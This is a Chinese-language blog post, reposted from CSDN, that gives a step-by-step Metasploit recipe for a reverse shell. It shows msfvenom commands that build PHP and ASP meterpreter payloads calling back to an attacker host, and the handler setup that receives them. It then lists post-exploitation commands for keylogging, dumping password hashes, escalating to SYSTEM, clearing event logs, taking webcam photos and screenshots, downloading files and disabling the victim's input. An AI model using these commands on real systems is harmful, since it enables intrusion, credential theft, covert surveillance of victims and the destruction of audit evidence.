msf建立php反弹shell

2021-08-18 12:58

阅读:708

标签:erp   star   sdn   漏洞   屏幕截图   asp   keyboard   stop   reboot   一   建立反弹后门 msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php     注:生成的反弹木马存放在当前用户home目录下; 将生成的木马上传到目标机中,可以远程访问; windows下asp反弹木马: root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 -f asp > shell.asp             二 监听端口建立会话 1 使用handler模块 msf > use exploit/multi/handler 2 设置payload msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows) PAYLOAD =>php/meterpreter/reverse_tcp 3 设置监听主机 msfexploit(multi/handler) > set LHOST 192.168.88.155 LHOST =>192.168.88.155 4 设置监听端口(默认4444) msfexploit(multi/handler) > set LPORT 4444 LPORT => 4444 5 发动攻击 msfexploit(multi/handler) > exploit   注:要远程访问你上传的后门文件   meterpreter > keyscan_start keyscan_dump // 查看键盘记录 监控目标系统键盘输入,停止监控为keyscan_stop   meterpreter > migrate 将你的Meterpreter移到另一个进程 先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)   meterpreter > getuid 获取用户的服务器运行 meterpreter > shell 进入目标电脑,命令提示符 meterpreter > Idletime 目标电脑闲置了多长时间 meterpreter > Hashdump 导出对方SAM数据库里的内容,推荐一个hash破解网站: http://www.objectif-securite.ch/products.php meterpreter > getsystem 利用已自漏洞,自动提权为SYSTEM   meterpreter > clearev 清除事件日志    meterpreter > execute(某Windows指令) 在对方电脑上运行该指令 meterpreter > execute Usage: execute -f file [options]  meterpreter > download(文件路径) 下载文件命令 例如下载C盘下面的jzking121.txt文件 meterpreter > download c:\\jzking121.txt [*] downloading: c:\jzking121.txt -> jzking121.txt [*] downloaded : c:\jzking121.txt -> jzking121.txt 注意,文件路径中要有两个\\ Upload指令跟Download指令类似!    meterpreter > shutdown  关闭目标计算机,reboot为重启计算机   meterpreter >screenshot 获取目标电脑,屏幕截图    meterpreter > uictl enable keyboard 启用目标使用键盘 meterpreter > uictl disable mouse   禁止目标使用鼠标 enable 为启用 disable 禁用    meterpreter > webcam_list 目标系统的摄像头列表    meterpreter > webcam_snap 从指定的摄像头,拍摄照片    meterpreter > search -d c:\\ -f 1.jpg 搜索目标电脑,C盘1.jpg文件————————————————转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258msf建立php反弹shell标签:erp   star   sdn   漏洞   屏幕截图   asp   keyboard   stop   reboot   原文地址:https://www.cnblogs.com/ly584521/p/12330746.html


评论


亲,登录后才可以留言!